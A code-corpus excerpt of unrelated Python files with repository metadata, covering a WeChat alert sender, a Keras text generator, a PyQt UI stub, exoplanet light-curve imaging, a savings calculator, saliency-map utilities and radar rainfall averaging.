anzehuang/walrus | 10,256,381,913,006 | 3aa9b963a6a03e5a3b6977e3c68747b0d46d8f75 | 0779b0bb26e948ed9bc53a977d1082072bdd463b | /walrus/pylib/pyweixin.py | 5af377f439ea2e231628de2c0423a6fdeb0a3114 | [] | no_license | https://github.com/anzehuang/walrus | b1945909034f1ce2f4f4abfd6cdd69acf9af3cf6 | 2f3e9fa880ed8a0dae0114198cdad9f1ff6e61dc | refs/heads/master | 2015-08-12T13:38:15 | 2014-07-16T10:07:31 | 2014-07-16T10:07:31 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
# coding:utf-8
import urllib
import urllib2
#from poster.encode import multipart_encode
#from poster.streaminghttp import register_openers
Sender = "walrus_admin"
def send_weixin(receiver, msg, flag=0):
'''
接口使用说明:
注意:消息中的中文字符串前面不要加'u'
1. flag == 0: text, 文字,默认值
eg. msg = "微信报警,让运维的工作从此变得轻松。"
2. flag == 1: chart, 曲线图
eg. msg = {"title":"微信报警曲线图标题",
"desc1":"图例描述1",
"desc2":"图例描述2",
"desc3":"图例描述3",
"label":["19:38","19:39","19:40","19:41","19:42","19:43","19:44","19:45","19:46","19:47"],
"data1":["3165","3123","3144","11003","11209","2309","3144","3165","3146","3193"],
"data2":["3365","2123","2244","3033","1109","2203","1144","3265","2126","3143"],
"data3":["3263","3113","3134","2003","1209","2109","1244","3163","3346","3193"]}
3. flag == 2: table, 数据表
eg. msg = {"header":["时间","系统调用数","系统失败数","系统失败率","端口调用数","端口失败数","端口失败率"],
"data1":["19:00","1234","3","0.3%","13023","10","0.01%"]
,"data2":["19:05","1230","3","0.3%","12423","20","0.01%"]
,"data3":["19:10","1134","30","0.3%","11423","10","0.01%"]
,"data4":["19:15","1034","33","0.3%","12423","30","0.01%"]
,"data5":["19:20","1004","322","0.3%","13323","60","0.01%"]
,"data6":["19:25","834","333","0.3%","9123","100","0.01%"]
}
'''
receiver = receiver.replace(' ', '')
receiver = receiver.split(";")
if '' in receiver:
receiver.remove('')
Rcptto = receiver
d_escape = {
"\a": "\\a",
"\b": "\\b",
"\n": "\\n",
"\t": "\\t",
"\v": "\\v",
"\r": "\\r",
"\f": "\\f",
"\000": "\\000"
}
encodeChartTable = {}
# 替换转义字符
for escape in d_escape:
if isinstance(msg, str):
msg = msg.replace(escape, d_escape[escape])
elif isinstance(msg, dict):
for k in msg:
if isinstance(msg[k], list):
msg[k] = [v.replace(escape, d_escape[escape]) for v in msg[k]]
encodeChartTable[k] = [urllib.quote(v) for v in msg[k]]
else:
msg[k] = msg[k].replace(escape, d_escape[escape])
encodeChartTable[k] = urllib.quote(msg[k])
else:
raise Exception("Unknown message format! please the message defined by yourself!")
if flag == 0:
# text, 文字
jsondata = str({"Sender": Sender,
"Rcptto": Rcptto,
"isText": urllib.quote(msg)}).replace("\'", "\"")
elif flag == 1 or flag == 2:
# chart, 曲线图; table, 数据表
jsondata = str({"Sender": Sender,
"Rcptto": Rcptto,
"isChart" if flag == 1 else "isTable": encodeChartTable}).replace("\'", "\"")
else:
raise Exception("Unknown message type! the flag must be in [0,1,2]!")
request = urllib2.Request(url='http://10.185.8.11/cgi-bin/sendmsg', data='data=%s'%jsondata)
ret_str = urllib2.urlopen(request).read()
# 微信反馈失败!发送微信错误消息
if '"errCode":"0"' not in ret_str:
sTemp = ret_str.split(',')
sTemp = sTemp[1].split(':')
isText = "微信反馈失败!失败原因:消息格式" + sTemp[1].strip("\"").decode("gbk").encode("utf-8")
jsondata = str({"Sender": Sender,
"Rcptto": Rcptto,
"isText": urllib.quote(isText)}).replace("\'", "\"")
request = urllib2.Request(url='http://10.185.8.11/cgi-bin/sendmsg', data='data=%s' % jsondata)
return urllib2.urlopen(request).read()
if __name__ == '__main__':
receiver = "anzehuang"
msg = "不是有效地JSON数据结构"
send_weixin(receiver, msg)
| UTF-8 | Python | false | false | 4,240 | py | 160 | pyweixin.py | 94 | 0.47269 | 0.382338 | 0 | 100 | 38.18 | 106 |
AryeYellow/PyProjects | 11,201,274,744,751 | f56ff5dfd689588672678e868f8b3732d0c68690 | 0cf87d20da6438f6b6831a4d385ecd88d9b5a45e | /Keras/TextGeneration/cnn_train.py | 4c94ce9c1b2fb429e467cbf34a3fe0d9c71ab79a | [] | no_license | https://github.com/AryeYellow/PyProjects | 038a221f6b027e1b024c3effc957dc8709f4f974 | fcbf3a4c7fc7f1cdd989f7eb1dc389a9af6540e6 | refs/heads/master | 2020-05-21T04:06:37.991879 | 2019-10-29T11:18:49 | 2019-10-29T11:18:49 | 185,904,582 | 25 | 23 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np, os
from collections import Counter
from keras.utils import to_categorical
from keras.models import Sequential, load_model
from keras.layers import Conv1D, MaxPool1D, GlobalMaxPool1D, Dense
from TextGeneration.conf import *
from warnings import filterwarnings
filterwarnings('ignore') # 不打印警告
def preprocessing():
"""语料加载"""
with open(corpus_path, encoding='utf-8') as f:
seq_chr = f.read().replace('\n', '')
"""数据预处理"""
len_seq = len(seq_chr) # 语料长度
chr_ls = Counter(list(seq_chr)).most_common(len_chr)
chr_ls = [i[0] for i in chr_ls]
chr2id = {c: i for i, c in enumerate(chr_ls)}
id2chr = {i: c for c, i in chr2id.items()}
seq_id = [chr2id[c] for c in seq_chr] # 文字序列 --> 索引序列
yield len_seq, id2chr, seq_id
"""输入层和标签"""
reshape = lambda x: np.reshape(x, (-1, window, 1)) / len_chr
x = [seq_id[i: i + window] for i in range(len_seq - window)]
x = reshape(x)
y = [seq_id[i + window] for i in range(len_seq - window)]
y = to_categorical(y, num_classes=len_chr)
print('x.shape', x.shape, 'y.shape', y.shape)
yield reshape, x, y
(len_seq, id2chr, seq_id), (reshape, x, y) = list(preprocessing())
"""建模"""
if os.path.exists(filepath):
print('load_model')
model = load_model(filepath)
else:
print('modeling')
model = Sequential()
model.add(Conv1D(filters, kernel_size * 2, padding='same', activation='relu'))
model.add(MaxPool1D())
model.add(Conv1D(filters * 2, kernel_size, padding='same', activation='relu'))
model.add(GlobalMaxPool1D())
model.add(Dense(len_chr, activation='softmax'))
model.compile('adam', 'categorical_crossentropy')
def draw_sample(predictions, temperature):
"""随机采样"""
pred = predictions.astype('float64') # 提高精度防报错
pred = np.log(pred) / temperature
pred = np.exp(pred)
pred = pred / np.sum(pred)
pred = np.random.multinomial(1, pred, 1)
return np.argmax(pred)
def predict(t, pred=None):
"""预测"""
if pred is None:
randint = np.random.randint(len_seq - window)
pred = seq_id[randint: randint + window]
if t:
print('随机采样,温度:%.1f' % t)
sample = draw_sample
else:
print('贪婪采样')
sample = np.argmax
for _ in range(window):
x_pred = reshape(pred[-window:]) # 窗口滑动
y_pred = model.predict(x_pred)[0]
i = sample(y_pred, t)
pred.append(i)
text = ''.join([id2chr[i] for i in pred[-window:]])
print('\033[033m%s\033[0m' % text)
"""训练及评估"""
for e in range(times):
model.fit(x, y, batch_size, epochs, verbose=2)
model.save(filepath)
print(str(e + 1).center(window * 2, '-'))
# 训练效果展示
for t in (None, 1, 1.5, 2):
predict(t)
| UTF-8 | Python | false | false | 2,984 | py | 78 | cnn_train.py | 29 | 0.592031 | 0.576869 | 0 | 89 | 29.865169 | 82 |
ZJanPei/PyQtLearn | 8,126,078,133,835 | dbe63a9ebaa211b4a48c4f89243ed8ccd33a2235 | 53fc3ca7147b646100950b08741a19546c3ebf88 | /ui/ui_Main.py | 605edc334341186d0879e7223b4ba4da82159d34 | [] | no_license | https://github.com/ZJanPei/PyQtLearn | 33721a0857e32470718c1db17e06f52818c59ed7 | 0611ab838640bbd73452e717ed4cc1cfac41d3c1 | refs/heads/master | 2020-03-16T15:31:10.621833 | 2018-05-15T03:40:20 | 2018-05-15T03:40:20 | 132,746,992 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'Main.ui'
#
# Created by: PyQt5 UI code generator 5.6
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Main(object):
def setupUi(self, Main):
Main.setObjectName("Main")
Main.resize(400, 300)
self.LoginpushButton = QtWidgets.QPushButton(Main)
self.LoginpushButton.setGeometry(QtCore.QRect(30, 30, 75, 23))
self.LoginpushButton.setObjectName("LoginpushButton")
self.retranslateUi(Main)
QtCore.QMetaObject.connectSlotsByName(Main)
def retranslateUi(self, Main):
_translate = QtCore.QCoreApplication.translate
Main.setWindowTitle(_translate("Main", "Form"))
self.LoginpushButton.setText(_translate("Main", "登录"))
| UTF-8 | Python | false | false | 844 | py | 16 | ui_Main.py | 14 | 0.688095 | 0.665476 | 0 | 25 | 32.56 | 70 |
Buguemar/PIIC19 | 17,961,553,265,553 | 0c077ab4c57cc2ce3aa11284318a3d093d2b3221 | e083533a1b00eb49acaa6ca6773b4e5605ba92ee | /code/obj1/old_stuff/run_GAF.py | 2623234492850ec8f243c29588352b7ae1453956 | [] | no_license | https://github.com/Buguemar/PIIC19 | 913729c2c77ca8712e9dfc4ab817e0f277dd8ba7 | 54a5743b8660b8209c9b70d65e1cef04f7622575 | refs/heads/master | 2023-06-06T17:46:37.755334 | 2021-07-15T08:16:08 | 2021-07-15T08:16:08 | 184,789,297 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding: utf-8
from IPython.display import display, Image
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import os, sys ,gc, math, time
from PIL import Image
from keras.layers import *
from keras.models import Sequential
from keras import backend as K
from optparse import OptionParser
op = OptionParser()
op.add_option("-s", "--size", type="string", default="20", help="size of matrix to generate")
op.add_option("-p", "--pool", type="int", default=2, help="pool size")
(opts, args) = op.parse_args()
winds = opts.size.lower().split("/")
pool = opts.pool
dirpath = os.getcwd().split("code")[0]+"code/"
sys.path.append(dirpath)
from pre_process import clean_LC
our_process = np.load('/work/work_teamEXOPLANET/KOI_LC/cleaned/LC_kepler_processed.npy')
#### importante:
def prepare_lc_GAF(fluxs): #rango entre -1 y 1
max_f = np.nanmax(fluxs)
min_f = np.nanmin(fluxs)
return (2*fluxs- max_f - min_f)/(max_f-min_f)
class GAF(object):
def __init__(self, fluxs):
self.X_cos = np.asarray(fluxs).astype('float32')
I = np.ones(self.X_cos.shape[0], dtype='float32')
self.X_sin = np.sqrt(np.clip(I - self.X_cos**2, 0, 1))
def transform(self, method='sum'):
if method == 'sum':
return np.tensordot(self.X_cos, self.X_cos, axes=-1) - np.tensordot(self.X_sin, self.X_sin, axes=-1)
elif method == "diff":
return np.tensordot(self.X_sin, self.X_cos, axes=-1) - np.tensordot(self.X_cos, self.X_sin, axes=-1)
#T = our_process.shape[1]
#reduc = T/float(wind) ##########OJO
#repeat = math.floor(np.log(reduc)/np.log(pool))
#model = Sequential()
#model.add(InputLayer(input_shape=(T,T)))
#model.add(Lambda(lambda x: K.expand_dims(x, axis=-1)))
#for _ in range(repeat):
# model.add(AveragePooling2D(pool))
#model.add(Lambda(lambda x: K.squeeze(x, axis=-1)))
def resize_image(img, w):
# return model.predict(img[None,:,:])[0]
aux = Image.fromarray(img)
to_return = aux.resize((w,w), Image.NEAREST)
aux.close()
return np.asarray(to_return)
#file_name_S = "/work/work_teamEXOPLANET/GAF/GASF_%s.npy"%wind
#file_name_D = "/work/work_teamEXOPLANET/GAF/GADF_%s.npy"%wind
print("ATENCION, ESTA EJECUTANDO MULTIPLES SIZE DE RESHAPE, LEERA TODOS LOS DATOS SECUENCIALES, COMO PUNTO DE PARTIDA EL ULTIMO SIZE QUE PUSO EN LOS ARCHIVOS GUARDADOS!! NO EJECUTE MULTIPLES SIZE EN DIFERENTES CODIGOS")
file_aux = "/work/work_teamEXOPLANET/GAF/GASF_%s.npy"%winds[-1]
if os.path.isfile(file_aux):
i = np.load(file_aux).shape[0]
else:
i=0
print("Starting in >>> ",i)
for lc_our_detrend in our_process[i:]:
print ("Procesando curva",i)
fluxs = prepare_lc_GAF(lc_our_detrend) #scale -1 y 1
#mask_nans = np.isnan(fluxs)
#fluxs[mask_nans] = 0 #or mask value
model_gaf = GAF(fluxs)
X_gasf = model_gaf.transform(method='sum')
#X_gasf[mask_nans,:] = 0
#X_gasf[:,mask_nans] = 0
X_gadf = model_gaf.transform(method='diff')
#X_gadf[mask_nans,:] = 0
#X_gadf[:,mask_nans] = 0
to_save_S = []
to_save_D = []
for wind in winds:
print(">>> size ** %s ** ..."%wind,end='')
file_name_S = "/work/work_teamEXOPLANET/GAF/GASF_%s.npy"%wind
file_name_D = "/work/work_teamEXOPLANET/GAF/GADF_%s.npy"%wind
X_gasf_res = resize_image(X_gasf, int(wind))
X_gadf_res = resize_image(X_gadf, int(wind))
if i ==0:
X_total_gasf = X_gasf_res[None,:,:]
else:
X_total_gasf = np.load(file_name_S)[:i] #avoid write/read errors
X_total_gasf = np.append(X_total_gasf, X_gasf_res[None,:,:], axis=0)
to_save_S.append(X_total_gasf)
if i ==0:
X_total_gadf = X_gadf_res[None,:,:]
else:
X_total_gadf = np.load(file_name_D)[:i] #avoid write/read errors
X_total_gadf = np.append(X_total_gadf, X_gadf_res[None,:,:], axis=0)
to_save_D.append(X_total_gadf)
del X_gasf_res, X_gadf_res, X_total_gadf, X_total_gasf
print(" completado")
del X_gasf, X_gadf #borrar originales y trabajar con las chicas solamente
print(">>> Comienza a guardar archivos", end='')
for wind, value_S, value_D in zip(winds,to_save_S,to_save_D):
file_name_S = "/work/work_teamEXOPLANET/GAF/GASF_%s.npy"%wind
file_name_D = "/work/work_teamEXOPLANET/GAF/GADF_%s.npy"%wind
np.save(file_name_S, value_S)
np.save(file_name_D, value_D)
print(" todos archivos guardados con exito!")
del model_gaf, fluxs, to_save_S, to_save_D
gc.collect()
i+=1
print("TERMINADO!!!!!!!!")
| UTF-8 | Python | false | false | 4,677 | py | 181 | run_GAF.py | 23 | 0.617276 | 0.608724 | 0 | 132 | 34.424242 | 219 |
momentum-cohort-2018-10/w1d2-house-hunting-Komor-RP | 7,645,041,811,256 | 5cbc5d98bfb67df99d21da5643543e461660b156 | 9d324f74bd7c383e283bf5e0e71f13c34a862ae4 | /house-hunting.py | 98ba2c1e9fd31ee73bc03a08580ea9b9f5613afc | [] | no_license | https://github.com/momentum-cohort-2018-10/w1d2-house-hunting-Komor-RP | 2fca593860575771dd4ed638262956ba79523214 | f25768e24f299d2c61f5cb4997d31fc17208eb6d | refs/heads/master | 2020-04-03T16:00:59.193308 | 2018-10-30T14:29:40 | 2018-10-30T14:29:40 | 155,387,463 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | annual_salary = input("Enter your annual salary: ")
portion_saved = input("Enter the percent of your salary to save, as a decimal: ")
rate_of_return = input("Enter the expected annual rate of return [0.04]: ")
total_cost = input("Enter the cost of your dream home: ")
portion_down_payment = input("Enter the percent of your home's cost to save as a down payment [0.25]: ")
annual_salary = float(annual_salary)
portion_saved = float(portion_saved)
if (rate_of_return):
rate_of_return = float(rate_of_return)
total_cost = float(total_cost)
if (portion_down_payment):
portion_down_payment = float(portion_down_payment)
def number_of_months(annual_salary, portion_saved, total_cost, portion_down_payment=.25, rate_of_return=.04):
months = 0
current_savings = 0
while (current_savings < (total_cost * portion_down_payment)):
current_savings = current_savings + (current_savings * (rate_of_return / 12))
current_savings = current_savings + (portion_saved * annual_salary / 12)
months += 1
print("Number of months: " + str(months))
number_of_months(annual_salary, portion_saved, total_cost) | UTF-8 | Python | false | false | 1,166 | py | 1 | house-hunting.py | 1 | 0.684391 | 0.669811 | 0 | 32 | 35.46875 | 109 |
sannareddy/openerp-heimai | 6,476,810,718,139 | 0b74134e6c0a2cbb3e0a3060522bf84ee4563f8e | a2ac73af04a07bb070cd85c88778608b561dd3e4 | /addons/account_followup/account_followup.py | 121234d91da0b2c3b342cc9dd054ad7e95d5ba92 | [] | no_license | https://github.com/sannareddy/openerp-heimai | c849586d6099cc7548dec8b3f1cc7ba8be49594a | 58255ecbcea7bf9780948287cf4551ed6494832a | refs/heads/master | 2021-01-15T21:34:46.162550 | 2014-05-13T09:20:37 | 2014-05-13T09:20:37 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | /usr/share/pyshared/openerp/addons/account_followup/account_followup.py | UTF-8 | Python | false | false | 71 | py | 9,135 | account_followup.py | 1,609 | 0.859155 | 0.859155 | 0 | 1 | 71 | 71 |
diaopk/group_project | 1,056,562,001,897 | a0a1b102db22815ead8057ff8bae54ff7ebc4900 | 60973db6a73f846d101f8456768c921d0333ca47 | /pc.py | 33071e07d77bf53bcfa95b516b434953635e9b0b | [] | no_license | https://github.com/diaopk/group_project | 547400873684361e546801dbdd3d0990730a563a | 427837af551bca3df0ec12adedb554174a18ab49 | refs/heads/master | 2021-01-20T08:01:56.251769 | 2019-09-13T15:57:22 | 2019-09-13T15:57:22 | 90,089,519 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/...
# This script defines a Photo Manager that implements the iterator protocol
# to store and orgnise photos
# ,and a Photo object
# Import required modules
from picamera import *
from datetime import datetime
from os import listdir
from re import search
# Photo Manager
class Photo_Manager:
def __init__(self):
self.camera = PiCamera()
#self.camera.resolution(800,480)
self.photo_seq = self.__browse() # photo_seq holds a sequence of photo objects
self.index = 0 # index hold the current index of a photo object
self.current_photo = self.photo_seq[self.index] # current photo object
def __iter__(self): return self
def get_photos(self): return self.photo_seq
def get_current_photo(self): return self.current_photo
def get_index(self): return self.index
# Method to take photo and store it into the photo_seq
def take_photo(self):
time = datetime.now()
path = './test_picamera/%s.jpg' % time
self.camera.capture(path)
photo = Photo(path, time)
self.photo_seq.append(photo)
self.current_photo = self.photo_seq[0]
# Method to list all photos in the directory
# and store them as photo objects into photo_seq
def __browse(self):
lst = listdir('./test_picamera/')
res_lst = []
for photo in lst:
if search('.jpg$', str(photo)):
path = './test_picamera/' + str(photo)
time = photo.partition('.jpg')[0]
res_lst.append(Photo(path, time))
elif search('.png$', str(photo)):
path = './test_picamera/' + str(photo)
time = photo.partition('.png')[0]
res_lst.append(Photo(path, time))
return res_lst
# Method to return next photo object
# and set index and current_photo to the next photo object
def next(self):
"""try:
self.index += 1
self.current_photo = self.photo_seq[self.index].get_path()
return self.photo_seq[self.index]
except StopIteration, e:
print 'stop', e
#pass
return None"""
if self.index < len(self.photo_seq) -1:
self.index += 1
self.current_photo = self.photo_seq[self.index]
return self.photo_seq[self.index]
else:
print 'stop'
raise
# Method to return previous photo object
# and set index and current_photo to the previous photo object
def up(self):
try:
self.index -= 1
self.current_photo = self.photo_seq[self.index]
except StopIteration, e:
print 'stop', e
pass
return self.photo_seq[self.index]
# Method to return the first photo object of the photo_seq
# and set index and current_photo to the first photo object
def first(self):
if len(self.photo_seq) >= 1:
self.refresh()
return self.photo_seq[0]
else:
print 'empty photo_seq'
pass
# Method to return the last photo object of the phpoto_seq
# and set index and current_photo to the last photo object
def last(self):
if len(self.photo_seq) == 1:
self.refresh()
return self.photo_seq[0]
elif len(self.photo_seq) > 1:
self.index = len(self.photo_seq) - 1
self.current_photo = self.photo_seq[len(self.photo_seq)-1]
return self.photo_seq[len(self.photo_seq)-1]
else:
print 'Empty photo_seq'
pass
# Method to make current photo back to the origional state
# and set index and current_photo to the first photo object
def refresh(self):
if len(self.photo_seq) == 0:
pass
else:
self.index = 0
self.current_photo = self.photo_seq[0]
# Photo object
class Photo:
def __init__(self, path, datetime):
self.path = path
self.datetime = datetime
def get_datetime(self): return self.datetime
def get_path(self): return self.path
| UTF-8 | Python | false | false | 4,140 | py | 13 | pc.py | 11 | 0.583816 | 0.577778 | 0 | 123 | 32.658537 | 86 |
bryanmartineze/proyectos-python | 652,835,042,584 | 8f6fc993ef071e2e5b749dfd56f8420de6747b09 | 1f3763d72d284d81a88de8e1b1f83c89c3811479 | /tuples/tuples.py | 92c48ded8a25b32c069e6d7fe8edf4a9b42e1b12 | [] | no_license | https://github.com/bryanmartineze/proyectos-python | c56a5028cc4743b5d4b91dedc554645207e8b2d2 | c575de3cee365fba25a7fddc6ce56d27d6adbac1 | refs/heads/master | 2023-07-26T03:42:33.390950 | 2021-08-26T00:03:35 | 2021-08-26T00:03:35 | 393,833,114 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #Las tuplas son variables que pueden guardar una colección de datos
coordenadas = (3, 5)
#Las tuplas son inmutables, que no pueden cambiarse ni modificarse
# print(coordenadas)
# #Podemos mostrar el numero de una tupla
# print(coordenadas[1])
#Podemos crear listas de tuplas
lista_de_coordenadas = [(3,5), (6,4), (3.7,80,12)]
print(lista_de_coordenadas) | UTF-8 | Python | false | false | 361 | py | 15 | tuples.py | 14 | 0.738889 | 0.702778 | 0 | 16 | 21.5625 | 67 |
berayboztepe/Examples | 10,161,892,647,235 | cbf92bf84e70aefbd19490a2cf5fab623cc6c0d3 | 95d309891dcec0a27a81a6930b1846e4b8bec131 | /Project Euler/project-euler-32.py | 6c7f3969422adcc79eb9db17c53cbc66b2157d7d | [] | no_license | https://github.com/berayboztepe/Examples | ef4ed8c68d442115862509118ae70d911c464f1d | 3d2abb6918d183245436444b164ae7b0268c521a | refs/heads/main | 2023-04-29T23:08:00.117527 | 2022-11-14T19:42:03 | 2022-11-14T19:42:03 | 308,640,780 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # We shall say that an n-digit number is pandigital if it makes use of all the digits 1 to n exactly once; for example,
# the 5-digit number, 15234, is 1 through 5 pandigital.
# The product 7254 is unusual, as the identity, 39 × 186 = 7254, containing multiplicand, multiplier, and product is 1 through 9 pandigital.
# Find the sum of all products whose multiplicand/multiplier/product identity can be written as a 1 through 9 pandigital.
# HINT: Some products can be obtained in more than one way so be sure to only include it once in your sum.
list, list1, list2, list4 = [], [], [], []
sum = 0
def my_frequency_with_dic(list):
frequency_dict = {}
for item in list:
if(item in frequency_dict):
return 0
else:
frequency_dict[item] = 1
return frequency_dict
for j in range(10, 10000):
ab = j
q = 0
while ab:
digit = ab % 10
if not digit in list:
list.append(digit)
else:
list.clear()
q = 1
break
ab //= 10
if q == 1:
continue
for i in range(2, int((j**(1/2))) + 1):
b = i
if j % i == 0:
a = int(j/i)
while i:
digit = i % 10
list1.append(digit)
i //= 10
while a:
digit = a % 10
list2.append(digit)
a //= 10
list4 += list1
list4 += list2
list4 += list
dict = my_frequency_with_dic(list4)
if not dict == 0:
for k in range(1, 10):
if 0 in dict.keys():
list4.clear()
list1.clear()
list2.clear()
break
if k in dict.keys():
if k == 9:
print(j, b, j/b)
q = 1
sum += j
else:
continue
else:
list4.clear()
list1.clear()
list2.clear()
break
else:
list4.clear()
list1.clear()
list2.clear()
if q == 1:
break
list.clear()
print(sum)
| UTF-8 | Python | false | false | 2,487 | py | 91 | project-euler-32.py | 52 | 0.417538 | 0.383749 | 0 | 80 | 29.075 | 140 |
marcellacornia/mlnet | 9,079,560,877,836 | 4041d0163c8a23d82e43b6dbce126fe370b3b87b | 7f8a7db3c33973e91688357663cd92f280e639fe | /utilities.py | c339528cdde192f03aca786124eef39846e849c3 | [
"MIT"
] | permissive | https://github.com/marcellacornia/mlnet | f3ff5647983ef584bd684b612a1b1db8a6541103 | bf6e4a9905915a2bddad2cbe45ac35524fd788c5 | refs/heads/master | 2021-11-20T11:34:01.721948 | 2021-10-26T14:05:12 | 2021-10-26T14:05:12 | 67,144,952 | 104 | 41 | null | null | null | null | null | null | null | null | null | null | null | null | null | from __future__ import division
import cv2
import numpy as np
def padding(img, shape_r=480, shape_c=640, channels=3):
img_padded = np.zeros((shape_r, shape_c, channels), dtype=np.uint8)
if channels == 1:
img_padded = np.zeros((shape_r, shape_c), dtype=np.uint8)
original_shape = img.shape
rows_rate = original_shape[0]/shape_r
cols_rate = original_shape[1]/shape_c
if rows_rate > cols_rate:
new_cols = (original_shape[1] * shape_r) // original_shape[0]
img = cv2.resize(img, (new_cols, shape_r))
if new_cols > shape_c:
new_cols = shape_c
img_padded[:, ((img_padded.shape[1] - new_cols) // 2):((img_padded.shape[1] - new_cols) // 2 + new_cols)] = img
else:
new_rows = (original_shape[0] * shape_c) // original_shape[1]
img = cv2.resize(img, (shape_c, new_rows))
if new_rows > shape_r:
new_rows = shape_r
img_padded[((img_padded.shape[0] - new_rows) // 2):((img_padded.shape[0] - new_rows) // 2 + new_rows), :] = img
return img_padded
def preprocess_images(paths, shape_r, shape_c):
ims = np.zeros((len(paths), shape_r, shape_c, 3))
for i, path in enumerate(paths):
original_image = cv2.imread(path)
padded_image = padding(original_image, shape_r, shape_c, 3)
ims[i] = padded_image
ims[:, :, :, 0] -= 103.939
ims[:, :, :, 1] -= 116.779
ims[:, :, :, 2] -= 123.68
ims = ims.transpose((0, 3, 1, 2))
return ims
def preprocess_maps(paths, shape_r, shape_c):
ims = np.zeros((len(paths), 1, shape_r, shape_c))
for i, path in enumerate(paths):
original_map = cv2.imread(path, 0)
padded_map = padding(original_map, shape_r, shape_c, 1)
ims[i, 0] = padded_map.astype(np.float32)
ims[i, 0] /= 255.0
return ims
def postprocess_predictions(pred, shape_r, shape_c):
predictions_shape = pred.shape
rows_rate = shape_r / predictions_shape[0]
cols_rate = shape_c / predictions_shape[1]
if rows_rate > cols_rate:
new_cols = (predictions_shape[1] * shape_r) // predictions_shape[0]
pred = cv2.resize(pred, (new_cols, shape_r))
img = pred[:, ((pred.shape[1] - shape_c) // 2):((pred.shape[1] - shape_c) // 2 + shape_c)]
else:
new_rows = (predictions_shape[0] * shape_c) // predictions_shape[1]
pred = cv2.resize(pred, (shape_c, new_rows))
img = pred[((pred.shape[0] - shape_r) // 2):((pred.shape[0] - shape_r) // 2 + shape_r), :]
return img / np.max(img) * 255 | UTF-8 | Python | false | false | 2,623 | py | 4 | utilities.py | 3 | 0.563096 | 0.53069 | 0 | 73 | 33.958904 | 119 |
YX577/aqualord | 12,524,124,639,742 | 68250f59ba97619bc62c9fd9ffdd46fbd6e5b403 | fe9ea4a12c38998c93e9caced4b745d3bc0a7977 | /rdr6min/basin_precipitation.py | 7974eddcde03ff013cd173f96ce59c2123dd6418 | [] | no_license | https://github.com/YX577/aqualord | d07d710ed3221d55c086eb9d669b7bdc9b247e71 | bc837db55f156b7cb85f83ff253905ec9c5cdeaf | refs/heads/master | 2022-11-26T10:15:23.002380 | 2020-07-29T12:53:06 | 2020-07-29T12:53:06 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''流域内的雷达测雨数据和雨量站数据的融合'''
import project_util
from geojson_utils import point_in_multipolygon, json
import numpy as np
import conditional_merge
def calculate_average_precipitation(geojson_file, precipitation_data, x_start_index, y_start_index, x_end_index,
y_end_index):
"""根据给定的各个像素的降雨数据计算面平均降雨"""
average_precipitation = 0
points = points_of_radar_map_in_basin(geojson_file)
gridx = np.arange(x_start_index, x_end_index, 1.0)
gridy = np.arange(y_start_index, y_end_index, 1.0)
for i in gridx:
for j in gridy:
if [i, j] in points:
average_precipitation = average_precipitation + precipitation_data[i - x_start_index, j - y_start_index]
average_precipitation = average_precipitation / (len(gridx) * len(gridy))
return average_precipitation
def points_of_radar_map_in_basin(geojson_file):
"""判断雷达图内哪些点在流域内,返回在流域内的像素格点的x_in_graph和y_in_graph"""
sql = "select * from t_be_radar_grid"
url, username, password, database = project_util.time_sequence_table()
radar_grids = project_util.mysql_sql(url, username, password, database, sql)
print(radar_grids)
radar_grid_in_basin = []
json_file = open(geojson_file, encoding='utf-8')
geojson_setting = json.load(json_file)
multipoly = geojson_setting['features'][1]['geometry']
print(geojson_setting)
for i in range(0, len(radar_grids)):
center_longitude = radar_grids.loc[i, 'center_longitude']
center_latitude = radar_grids.loc[i, 'center_latitude']
if is_point_in_boundary(center_longitude, center_latitude, multipoly):
radar_grid_in_basin.append([radar_grids.loc[i, 'x_in_graph'], radar_grids.loc[i, 'y_in_graph']])
print(radar_grid_in_basin)
project_util.write_2d_array_to_txt(radar_grid_in_basin, 'radar_grid_in_basin.txt')
return radar_grid_in_basin
def is_point_in_boundary(px, py, multipoly):
"""给定一个点的经纬度坐标,判断是否在多多边形边界内"""
# json_file = open(geojson_file, encoding='utf-8')
# geojson_setting = json.load(json_file)
point_str = '{"type": "Point", "coordinates": [' + str(px) + ', ' + str(py) + ']}'
print(point_str)
# multipoly_str = '{"type":"MultiPolygon","coordinates":[[[[0,0],[0,10],[10,10],[10,0],[0,0]]],[[[10,10],[10,20],[20,20],[20,10],[10,10]]]]}'
# multipoly = geojson_setting['features'][1]['geometry']
point = json.loads(point_str)
return point_in_multipolygon(point, multipoly)
# True
if __name__ == "__main__":
start_time = '2016-08-30 00:00:00'
end_time = '2016-09-09 00:00:00'
merge_data, x_start_index, y_start_index, x_end_index, y_end_index = conditional_merge.radar_rain_gauge_merge(
start_time, end_time)
geojson_file = "tests/huanren_boundary_gc.json"
average_rain = calculate_average_precipitation(geojson_file, merge_data, x_start_index, y_start_index, x_end_index,
y_end_index)
print(average_rain)
| UTF-8 | Python | false | false | 3,180 | py | 28 | basin_precipitation.py | 11 | 0.646097 | 0.621748 | 0 | 66 | 44.424242 | 145 |
snake1597/Scikit_learn | 7,945,689,504,977 | f251de253e6be677fd998ffd6d28315a55458069 | 0c19b05ca828c18cafed11456d4755e7733ba75a | /DecisionTree.py | 6294f8c34d3c31c2077b1471c11b0fa750faf1f8 | [] | no_license | https://github.com/snake1597/Scikit_learn | c14e4b0335bb3654ce474e430f18865289ad1d1f | 5e876146f4f53fe07dbf0847b23e4baadb488894 | refs/heads/master | 2020-07-10T19:56:00.179110 | 2019-08-26T00:46:00 | 2019-08-26T00:46:00 | 204,355,369 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from sklearn import datasets, tree, metrics
from sklearn.cross_validation import train_test_split
